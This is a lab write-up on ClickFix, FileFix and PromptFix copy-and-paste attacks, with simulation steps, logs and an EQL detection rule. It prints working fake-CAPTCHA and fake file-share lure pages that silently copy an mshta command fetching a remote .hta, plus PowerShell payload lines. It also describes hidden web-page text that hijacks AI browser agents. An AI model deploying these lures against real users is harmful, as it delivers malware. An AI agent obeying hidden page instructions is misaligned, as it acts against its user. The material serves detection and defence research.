The "AnyFix" Technique: A Deep Dive into Malicious Copy-and-Paste Attacks¶

This is a deep dive into the family of social engineering techniques we're calling "AnyFix," which includes variants like ClickFix, FileFix, and PromptFix. These attacks have seen rapid adoption by threat actors due to their effectiveness in bypassing traditional security controls by tricking users into executing malicious code. This technique is categorized under MITRE ATT&CK as T1204.004 - User Execution: Malicious Copy and Paste.

Threat Intelligence¶

The "AnyFix" family of social engineering techniques has shown a dramatic increase in adoption by a wide range of threat actors since 2023, from initial access brokers to nation-state groups. These methods exploit user trust in familiar interfaces to achieve code execution, often bypassing traditional defenses because the malicious activity is initiated by the user themselves.

Campaigns delivering malware such as LummaStealer, DarkGate, NetSupport RAT, and various ransomware families have successfully utilized these techniques. Threat actors like the Russian state-backed group Star Blizzard (also known as ColdRiver) and the Interlock ransomware gang have been observed employing ClickFix variants in their operations. The attack often begins with a phishing email, malvertising, or SEO poisoning that directs the user to a malicious webpage.

Attack Variants¶

There are multiple variants known in the "AnyFix" family. More variants are likely to emerge in the future.

ClickFix

The original technique, ClickFix, typically involves a webpage displaying a fake CAPTCHA or an error message. The user is instructed to copy a piece of text and paste it into the Windows Run dialog (Win+R) or a terminal to "fix" the issue. This command is often a PowerShell one-liner that downloads and executes the next stage of the attack.

FileFix

A stealthier evolution, FileFix, instructs the user to paste the malicious command into the Windows File Explorer address bar instead of the Run dialog. This can feel more benign to the user, as they may believe they are simply navigating to a file path. This method can also bypass Mark-of-the-Web (MOTW) warnings that would typically appear for downloaded files.

PromptFix

A newer and more sophisticated variant, PromptFix, targets users of AI-powered browsers and agents. Attackers embed malicious instructions in invisible text on a webpage. While the human user sees a normal page, the AI agent processes the hidden text as a command, potentially leading to actions like drive-by downloads or interacting with phishing sites without the user's knowledge.

References¶

Attack Simulation¶

We simulate parts of the attack to generate logs for further analysis. There are various options available:

Atomic Red Team¶

The Atomic Red Team project develops small and highly portable detection tests. They have created a special test for Clickfix, where Powershell is used to insert a payload as value for the RunMRU registry key. This simulation focuses on the unique registry artifact of the ClickFix technique and does not replicate the full user interaction.

Atomic Red Team test for ClickFix

Atomic Red Team: T1204.002 Test #12 - ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell

Simulates a ClickFix-style campaign by adding a malicious entry to the RunMRU registry key that launches mshta.exe with a remote payload:

Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "atomictest" -Value '"C:\Windows\System32\mshta.exe" http://localhost/hello6.hta'

Simulated ClickFix & FileFix Page¶

For a more realistic simulation, a static webpage can be crafted and hosted within a lab environment for live interaction from a victim machine. We will host HTML pages using Python on a Kali host and browse to them from a Windows host.

Webpages¶

We use simple HTML with JavaScript to copy the payload to the user's clipboard when a button is clicked, simulating the core mechanism of these attacks.

ClickFixFileFix

HTML code for simulated ClickFix page

Embedded code from the 'projects' folder in the GitHub repository. Contains example payload.

<!DOCTYPE html>
<head>
  <title>Verify you are human</title>
  <style>
    /* Base page styling */
    body {
      background-color: #f2f2f2;
      font-family: 'Segoe UI', sans-serif;
      margin: 0;
      padding: 40px 0;
      display: flex;
      justify-content: center;
      align-items: flex-start;
      min-height: 100vh;
    }

    /* Main centered container */
    .container {
      background-color: #ffffff;
      width: 560px;
      border-radius: 6px;
      box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
      border: 1px solid #dcdcdc;
      text-align: center;
    }

    /* Header section with title and timestamp */
    .header {
      padding: 40px 30px 10px;
    }

    .header h2 {
      font-size: 20px;
      color: #2f2f2f;
      margin: 0;
    }

    .timestamp {
      font-size: 13px;
      color: #7a7a7a;
      margin-top: 6px;
    }

    /* Instructions block */
    .instructions {
      text-align: left;
      padding: 25px 40px 10px;
      font-size: 15px;
      color: #333333;
      line-height: 1.6;
    }

    .instructions ol {
      margin: 0;
      padding-left: 20px;
    }

    /* Fake captcha button */
    .captcha-btn {
      display: inline-block;
      background-color: #ffffff;
      border: 2px solid #ccc;
      border-radius: 4px;
      padding: 10px 16px;
      font-size: 14px;
      cursor: pointer;
      margin-bottom: 15px;
      user-select: none;
    }

    /* Captcha checked state */
    .captcha-btn.checked {
      border-color: #107c10;
      color: #107c10;
      font-weight: bold;
    }

    /* Footer section with branding */
    .footer {
      font-size: 11.5px;
      color: #6b6b6b;
      background-color: #f7f7f7;
      padding: 12px 24px;
      border-top: 1px solid #dcdcdc;
      display: flex;
      justify-content: space-between;
      align-items: center;
    }

    .footer img {
      height: 16px;
    }
  </style>
</head>
<body>

  <div class="container">
    <!-- Header text -->
    <div class="header">
      <h2>Verify you are human</h2>
      <div class="timestamp">06/20/2025 10:22:45 AM</div>
    </div>

    <!-- Fake captcha button -->
    <button id="captcha" class="captcha-btn">Start verification</button>

    <!-- Instructions with steps -->
    <div class="instructions">
      <p>Please verify that you are a human to continue.</p>

      <ol id="steps">
        <li style="margin-bottom: 10px;">Press <strong>Windows Key + R</strong></li>
        <li style="margin-bottom: 10px;">Press <strong>CTRL + V</strong> and press <strong>Enter</strong></li>
      </ol>

    </div>

    <!-- Footer branding -->
    <div class="footer">
      <img src="https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg" alt="Microsoft">
    </div>
  </div>

  <!-- Hidden payload storage -->
  <textarea id="hiddenPayload" style="position:absolute; left:-9999px;"></textarea>

  <script>
    const captcha = document.getElementById('captcha');
    const steps = document.getElementById('steps');
    const hidden = document.getElementById("hiddenPayload");

    // Function executed when captcha is "solved"
    function solveCaptcha() {
      const payload = "mshta.exe http://192.168.1.100/open_calc.hta # ✅ I am not a robot - Verification ID: 123456 - Press OK";
      hidden.value = payload;
      hidden.select();
      hidden.setSelectionRange(0, hidden.value.length);
      const copied = document.execCommand("copy");
      if (copied) {
        // Update button appearance to verified state
        captcha.classList.add("checked");
        captcha.innerText = "Finish next steps";
      } else {
        alert("Clipboard copy not supported");
      }
    }

    // Attach click event to captcha button
    captcha.addEventListener("click", solveCaptcha);
  </script>
</body>
</html>

Hosting malicious webpage on Kali

Python command to host the malicious HTML files on Kali for the victim client to connect to.

$ ls
clickfix.html   filefix.html    open_calc.hta

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

clickfix_lure — Simulated ClickFix-style page.

??? note "Hosting malicious webpage on Kali" Python command to host the malicious HTML files on Kali for the victim client to connect to.

``` bash
$ ls
clickfix.html   filefix.html    open_calc.hta

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

HTML code for simulated FileFix page

Embedded code from the 'projects' folder in the GitHub repository. Contains example payload.

<!DOCTYPE html>
<head>
  <title>A file was shared with you</title>
  <style>
    /* Page layout and base font styling */
    body {
      background-color: #f2f2f2;
      font-family: 'Segoe UI', sans-serif;
      margin: 0;
      padding: 40px 0;
      display: flex;
      justify-content: center;
      align-items: flex-start;
      min-height: 100vh;
    }

    /* Main centered container */
    .container {
      background-color: #ffffff;
      width: 560px;
      border-radius: 6px;
      box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
      border: 1px solid #dcdcdc;
      text-align: center;
    }

    /* Header section containing file info */
    .header {
      padding: 40px 30px 10px;
    }

    .header h2 {
      font-size: 20px;
      color: #2f2f2f;
      margin: 0;
    }

    /* Timestamp under the header */
    .timestamp {
      font-size: 13px;
      color: #7a7a7a;
      margin-top: 6px;
    }

    /* Instructions block for user steps */
    .instructions {
      text-align: left;
      padding: 25px 40px 10px;
      font-size: 15px;
      color: #333333;
      line-height: 1.6;
    }

    .instructions ol {
      margin: 0;
      padding-left: 20px;
    }

    /* Styled button to simulate verification */
    #fileExplorer {
      background-color: #0078d4;
      color: white;
      border: none;
      padding: 12px 30px;
      font-size: 15px;
      border-radius: 4px;
      margin: 30px 0 40px;
      cursor: pointer;
    }

    #fileExplorer:hover {
      background-color: #005ea2;
    }

    /* Footer section mimicking official styling */
    .footer {
      font-size: 11.5px;
      color: #6b6b6b;
      background-color: #f7f7f7;
      padding: 12px 24px;
      border-top: 1px solid #dcdcdc;
      display: flex;
      justify-content: space-between;
      align-items: center;
    }

    .footer img {
      height: 16px;
    }
  </style>
</head>
<body>

  <div class="container">
    <!-- File announcement -->
    <div class="header">
      <h2>The file "HRPolicy.docx" was made available to you</h2>
      <div class="timestamp">06/20/2025 10:22:45 AM</div>
    </div>

    <!-- Step-by-step usage instructions -->
    <div class="instructions">
      <p>To access <strong>HRPolicy.docx</strong>, validate below and follow the steps:</p>
      <ol id="steps">
        <li style="margin-bottom: 10px;">Open File Explorer (<strong>Windows Key + E</strong>) and select the address bar (<strong>CTRL + L</strong>)</li>
        <li style="margin-bottom: 10px;">Paste the file path and press <strong>Enter</strong></li>
      </ol>
    </div>

    <!-- Hidden input to simulate file selection -->
    <input type="file" id="fileInput" webkitdirectory directory style="display:none;">
    <!-- Fake verification button -->
    <button id="fileExplorer">Verify that you are not a robot</button>

    <!-- Footer branding -->
    <div class="footer">
      <img src="https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg" alt="Microsoft">
    </div>
  </div>

  <!-- Hidden textarea for payload injection -->
  <textarea id="hiddenPayload" style="position:absolute; left:-9999px;"></textarea>

  <script>
    const fileInput = document.getElementById('fileInput');
    const steps = document.getElementById('steps');
    const hidden = document.getElementById("hiddenPayload");
    const fileExplorer = document.getElementById('fileExplorer');

    // On button click, copy payload path to clipboard, then open hidden file input
    fileExplorer.addEventListener('click', () => {
      const payload = "mshta.exe http://192.168.1.100/open_calc.hta  # C:\\company\\internal-secure\\filedrive\\HRPolicy.docx";
      hidden.value = payload;
      hidden.select();
      hidden.setSelectionRange(0, hidden.value.length);
      const copied = document.execCommand("copy");

      // File inputs cannot directly launch File Explorer
      // Hidden file input is clicked to simulate open dialog
      fileInput.click();
    });

    // When file input changes, reset and re-trigger after short delay
    fileInput.addEventListener('change', () => {
      alert("Please follow the stated instructions.");
      fileInput.value = "";
      setTimeout(() => fileInput.click(), 500);
    });
  </script>
</body>
</html>

filefix_lure — Simulated FileFix-style page.

Payloads¶

There is a large variety of payloads that can be used for these techniques as can be seen in the reports linked on top of this page. One of the first seen payloads in the wild leveraged .HTA files through Mshta. We will be using those to simulate the attack. The main difference between the "AnyFix" variations is the obscurity at the end of the payloads.

ClickFixFileFix

clickfix_payload — Simulated ClickFix Payload in Windows Run Dialog.

Mshta payload

Simulates a user pasting a potentially malicious Mshta command into the Windows run dialog, following a typical ClickFix structure to deceive users. This payload will open the Windows calculator application.

mshta.exe http://192.168.1.100/open_calc.hta # ✅ I am not a robot - Verification ID: 123456 - Press OK

Code for simulated .HTA payload file

Embedded code from the 'projects' folder in the GitHub repository. Contains payload to open Windows Calculator.

<html>
  <head>
    <hta:application
      id="OpenCalc"
      applicationname="OpenCalc"
      border="thin"
      caption="yes"
      showintaskbar="yes"
      maximizebutton="no"
      minimizebutton="no"
      sysmenu="yes"
      windowstate="normal" />
    <title>Open Calc</title>
    <script language="VBScript">
      Sub Window_OnLoad()
        Dim sh
        Set sh = CreateObject("WScript.Shell")
        sh.Run "calc.exe", 1, False
        window.Close
      End Sub
    </script>
  </head>
  <body>
  </body>
</html>

[Extra] Powershell payload

Simulates a user pasting a potentially malicious Powershell command into the Windows run dialog, following a typical ClickFix structure to deceive users.

powershell Invoke-RestMethod -Uri "https://www.cloudflare.com" -Method GET  # ✅ I am not a robot - Verification ID: 123456 - Press OK

filefix_payload — Simulated FileFix Payload in Windows Explorer.

Mshta payload

Simulates a user pasting a potentially malicious Mshta command into the Windows run dialog, following a typical ClickFix structure to deceive users. This payload will open the Windows calculator application.

mshta.exe http://192.168.1.100/open_calc.hta  # C:\\company\\internal-secure\\filedrive\\HRPolicy.docx

Code for simulated .HTA payload file

Embedded code from the 'projects' folder in the GitHub repository. Contains payload to open Windows Calculator.

[Extra] Powershell payload

Simulates a user pasting a potentially malicious Powershell command into the Windows Explorer, following a typical FileFix structure to deceive users.

powershell Invoke-RestMethod -Uri "https://www.cloudflare.com" -Method GET  # C:\\company\\internal-secure\\filedrive\\HRPolicy.docx

Logs¶

Host¶

Both simulations generated over 250 logs, primarily from Sysmon due to our detailed tracing configuration. The logs from both simulations are very similar, as expected from their parallel attack paths. The key difference lies in the specific registry keys that are modified.

clickfix_logs_summary — Summary of logs generated by ClickFix simulation. Results are similar for FileFix.

ClickFixFileFix

Elastic Defend only captured events related to the calculator process starting. It did not capture any RunMRU registry changes. This may be due to default policy configurations that do not monitor this specific registry key for changes. This highlights a potential visibility gap in some EDR solutions.

clickfix_logs_endpoint — Limited logs generated by Elastic Agent.

Sysmon, with an appropriate configuration (see architecture), provided full visibility into the attack chain. It logged the network connection to the malicious HTML page, the subsequent process events, and the modification of the registry. The RunMRU key will contain the payload when a command is executed from the Windows Run dialog.

Similar to the ClickFix simulation, Elastic Defend only captured the calculator process events. Sysmon, however, covered the full attack chain. For FileFix, the interesting registry artifact is the modification of the TypedPaths key, which is updated when a path is entered into the File Explorer address bar when Windows Explorer is opened through a browser (not via CTRL+E).

filefix_logs_sysmon_registry — Logs generated by Sysmon specific to registry changes during the FileFix attack chain.

Detection & Hunting¶

None of the default Elastic rules were triggered during the simulated attack sequence. This underscores the evasive nature of user-initiated execution.

Elastic has published an Elastic Defend detection rule for similar behavior. Below is an adapted version of the EQL query that can be used for creating a detection rule or for threat hunting in Kibana. The original query has been modified to include our findings and remove fields that may not be populated in all environments.

Also see the custom detection rule published in the repository.

[CUSTOM] [EQL] Execution of Suspicious Commands in Combination with AnyFix Registry Entry
sequence by host.id with maxspan=1m
  [ 
/* (1)! */ process where (event.action == "start" or event.action == "Process creation") and
/* (2)! */ process.name : ("cmd.exe", "powershell.exe", "curl.exe", "msiexec.exe", "mshta.exe", "wscript.exe", "cscript.exe") and
/* (3)! */ process.parent.name : ("explorer.exe", "msedge.exe") and 
/* (4)! */ process.args_count >= 2 ]
/* (5)! */  [ registry where event.action == "RegistryEvent (Value Set)" and
    registry.path : ("*RunMRU*", "*TypedPaths*") and
    registry.data.strings : ("*cmd*", "*powershell*", "*curl*", "*mshta*") ]

Event action filter: Include process creation events (Elastic Defend and Symon respectively).
Process name filter: Include high-risk or commonly abused executables used in AnyFix attacks.
Parent process filter: Restrict to processes launched by Explorer (user-initiated) or a browser (add more browser executables when needed).
Argument count filter: Only include processes with two or more arguments, indicating significant execution.
Registry modification: RunMRU (ClickFix) or TypedPaths (FileFix) registry keys written to then process starts.